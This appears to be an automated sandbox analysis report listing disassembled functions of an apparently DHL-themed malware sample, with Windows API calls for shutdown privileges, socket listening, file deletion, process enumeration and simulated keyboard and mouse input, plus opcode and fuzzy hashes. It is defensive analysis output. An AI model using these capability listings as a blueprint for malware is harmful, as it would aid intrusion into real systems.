                                                                                      • String ID:
                                                                                      • API String ID: 1737998785-0
                                                                                      • Opcode ID: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                                                                      • Instruction ID: 52fee5a0436d58109a5c7274bc8d4bda53593e9afb5465856b973b1530663c2c
                                                                                      • Opcode Fuzzy Hash: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                                                                      • Instruction Fuzzy Hash: A541CD35204651AFE720CF55D888F59BBE5FF45329F14C099E45A8BA62C739EC42CB90
                                                                                      Function 0009E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                                                                        • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                        • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 0009E932
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                      • API String ID: 2234035333-3163812486
                                                                                      • Opcode ID: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                                                                      • Instruction ID: cc19a8983acc6c6d2992c43a49adc68e1682a102a79cc99b4026ab16e9c5d437
                                                                                      • Opcode Fuzzy Hash: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                                                                      • Instruction Fuzzy Hash: A501F972B10211AFFF64A7B4DC86FFF72ACA714750F150521FD13E21D2D9A55C40A190
                                                                                      Function 000B1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000B1276
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1283
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 000B12BA
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B12C5
                                                                                      • closesocket.WSOCK32(00000000), ref: 000B12F4
                                                                                      • listen.WSOCK32(00000000,00000005), ref: 000B1303
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B130D
                                                                                      • closesocket.WSOCK32(00000000), ref: 000B133C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                      • String ID:
                                                                                      • API String ID: 540024437-0
                                                                                      • Opcode ID: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                                                                      • Instruction ID: 5b8665cc20aae47c41514f0cb18bce74db9faca1c94caa50ca62f9064ff440aa
                                                                                      • Opcode Fuzzy Hash: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                                                                      • Instruction Fuzzy Hash: 91417271A001009FE710DF64C494FAABBE6AF46318F588198D85A9F293C775ED85CBE1
                                                                                      Function 0006B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 0006B9D4
                                                                                      • _free.LIBCMT ref: 0006B9F8
                                                                                      • _free.LIBCMT ref: 0006BB7F
                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000D3700), ref: 0006BB91
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0010121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0006BC09
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00101270,000000FF,?,0000003F,00000000,?), ref: 0006BC36
                                                                                      • _free.LIBCMT ref: 0006BD4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 314583886-0
                                                                                      • Opcode ID: 6420b776f03fd80f23a996dcb03f13f498a9602eba34a175c412b79c72c2e644
                                                                                      • Instruction ID: 58d61816519d85ce935f20488a3f1af2a1fc19c34e37f810c7d72307f5f58c60
                                                                                      • Opcode Fuzzy Hash: 6420b776f03fd80f23a996dcb03f13f498a9602eba34a175c412b79c72c2e644
                                                                                      • Instruction Fuzzy Hash: ADC106B1A04205AFDB249F78CC51AEE7BFBEF41350F2441AAE494D7252EB709E81CB50
                                                                                      Function 0009D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                        • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009D420
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D470
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D481
                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D498
                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D4A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 2649000838-1173974218
                                                                                      • Opcode ID: 35851fdecccd56f4ca9c5a0744796b6418b372b9a083ce1aac94979664f86c8a
                                                                                      • Instruction ID: 090d73cf2960befda32fbb480a62d5f7a3204a30c38a7741a450837f80c5f10f
                                                                                      • Opcode Fuzzy Hash: 35851fdecccd56f4ca9c5a0744796b6418b372b9a083ce1aac94979664f86c8a
                                                                                      • Instruction Fuzzy Hash: 76317C710483459BD701EF64D8918EFB7ECAF92310F444A1EF4D5921A2EB20AA09DB63
                                                                                      Function 0006E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 4168288129-2761157908
                                                                                      • Opcode ID: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                                                                      • Instruction ID: cb51005c52b24984d30575d61d7a292c269593a44ef73ec8cee98cf77b3e3851
                                                                                      • Opcode Fuzzy Hash: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                                                                      • Instruction Fuzzy Hash: A5C24A71E086298FDB65CE28DD407EAB7F6EB48305F1441EAD84EE7241E774AE858F40
                                                                                      Function 000A648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 000A64DC
                                                                                      • CoInitialize.OLE32(00000000), ref: 000A6639
                                                                                      • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A6650
                                                                                      • CoUninitialize.OLE32 ref: 000A68D4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 886957087-24824748
                                                                                      • Opcode ID: 85a9e434770a5cfe73a083f7105cd5b7a1e562b2a2a28f1903c0b739977b6aba
                                                                                      • Instruction ID: a755369f84d5491f7ba026bce21061fa6cef6d1fa8dea5a07605ee30286083da
                                                                                      • Opcode Fuzzy Hash: 85a9e434770a5cfe73a083f7105cd5b7a1e562b2a2a28f1903c0b739977b6aba
                                                                                      • Instruction Fuzzy Hash: 13D16971508201AFD315EF64C881EABB7E8FF95304F04496DF5958B292EB71ED09CB92
                                                                                      Function 000B22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 000B22E8
                                                                                        • Part of subcall function 000AE4EC: GetWindowRect.USER32(?,?), ref: 000AE504
                                                                                      • GetDesktopWindow.USER32 ref: 000B2312
                                                                                      • GetWindowRect.USER32(00000000), ref: 000B2319
                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 000B2355
                                                                                      • GetCursorPos.USER32(?), ref: 000B2381
                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000B23DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2387181109-0
                                                                                      • Opcode ID: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                                                                      • Instruction ID: f6961c7161b0a8e59cb3a3178754536a94e0950b047ac11fd4dab9a4df171e76
                                                                                      • Opcode Fuzzy Hash: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                                                                      • Instruction Fuzzy Hash: 0731D072504315AFEB20DF54C849F9BB7E9FF88710F000A19F98997191DB35EA09CB92
                                                                                      Function 000A9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 000A9B78
                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000A9C8B
                                                                                        • Part of subcall function 000A3874: GetInputState.USER32 ref: 000A38CB
                                                                                        • Part of subcall function 000A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000A9BA8
                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000A9C75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1972594611-438819550
                                                                                      • Opcode ID: 2a9ab52a96e27c9766b864a3a668931cc75a1175c9207f66271b8747d468495c
                                                                                      • Instruction ID: f0e7e3bf6669153aa9e87861b77d67e6d30c823efee9c4c7c670f47e27be0657
                                                                                      • Opcode Fuzzy Hash: 2a9ab52a96e27c9766b864a3a668931cc75a1175c9207f66271b8747d468495c
                                                                                      • Instruction Fuzzy Hash: D4418271A0460A9FDF55DFA4CD85EEEBBF8EF06310F248155E905A6192EB309E84CF60
                                                                                      Function 00038060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • e8f1bc446112c9a4d8f0b4eb569591a0e023dd312824c1c97905eeb71e59803534dfd5c8e832f189001d93511e18da357505614a13b301b84e3e580495d5bec564, xrefs: 00075D0F
                                                                                      • ERCP, xrefs: 0003813C
                                                                                      • VUUU, xrefs: 0003843C
                                                                                      • VUUU, xrefs: 000383FA
                                                                                      • VUUU, xrefs: 000383E8
                                                                                      • VUUU, xrefs: 00075DF0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$e8f1bc446112c9a4d8f0b4eb569591a0e023dd312824c1c97905eeb71e59803534dfd5c8e832f189001d93511e18da357505614a13b301b84e3e580495d5bec564
                                                                                      • API String ID: 0-1741966463
                                                                                      • Opcode ID: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                                                                      • Instruction ID: b25fbd320c6b070b9df1cd388857161e1e38493ccc591583acc686938daf4fee
                                                                                      • Opcode Fuzzy Hash: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                                                                      • Instruction Fuzzy Hash: 75A28E70E0061ACBDF75CF58C8457EEB7B5BB44310F24C1A9E81AA7281EB759E81CB94
                                                                                      Function 0004997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00049A4E
                                                                                      • GetSysColor.USER32(0000000F), ref: 00049B23
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00049B36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$LongProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3131106179-0
                                                                                      • Opcode ID: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                                                                      • Instruction ID: b5f28a87c658d71f3e75c828daae8e0a27486c26938d81607ab5dd5660d5276a
                                                                                      • Opcode Fuzzy Hash: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                                                                      • Instruction Fuzzy Hash: 6EA13AF0108404BEE778BB2C8C48EBF36DDEB42350B254239F546D6A96CA25DD51C3BA
                                                                                      Function 000B1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                                                                        • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000B185D
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1884
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 000B18DB
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B18E6
                                                                                      • closesocket.WSOCK32(00000000), ref: 000B1915
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1601658205-0
                                                                                      • Opcode ID: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                                                                      • Instruction ID: c6f4e12f4ff35de1769cdcdb6063e8ee02445b1538d0e7144c7e13066591265a
                                                                                      • Opcode Fuzzy Hash: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                                                                      • Instruction Fuzzy Hash: 9851C8B5A002006FEB11AF24C896FAA77E5AF44718F54845CFA09AF3D3CB75AD41CB91
                                                                                      Function 000C1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                      • String ID:
                                                                                      • API String ID: 292994002-0
                                                                                      • Opcode ID: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                                                                      • Instruction ID: 37815dcc9fd267c7b3c9e21cf9a43a1d7ccac5de30655a3ee541405882940c53
                                                                                      • Opcode Fuzzy Hash: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                                                                      • Instruction Fuzzy Hash: E52180317402105FE7208F1AC884FAE7BE5AF96315F19806CE84A8B352C775DC42CB90
                                                                                      Function 000BA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 000BA6AC
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 000BA6BA
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 000BA79C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000BA7AB
                                                                                        • Part of subcall function 0004CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00073303,?), ref: 0004CE8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1991900642-0
                                                                                      • Opcode ID: df59a0dc9a62d9fe134fa01bb8c8e2d6c46e914fe7e77d07bbe2242ac6730337
                                                                                      • Instruction ID: fb2b02e498359e295122868607da3899b03e45c1556c59e0dfb1d3081c8c549e
                                                                                      • Opcode Fuzzy Hash: df59a0dc9a62d9fe134fa01bb8c8e2d6c46e914fe7e77d07bbe2242ac6730337
                                                                                      • Instruction Fuzzy Hash: E25160B1508301AFD710DF25C886EABBBE8FF89754F40892DF58997252EB71D904CB92
                                                                                      Function 0009AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0009AAAC
                                                                                      • SetKeyboardState.USER32(00000080), ref: 0009AAC8
                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0009AB36
                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0009AB88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
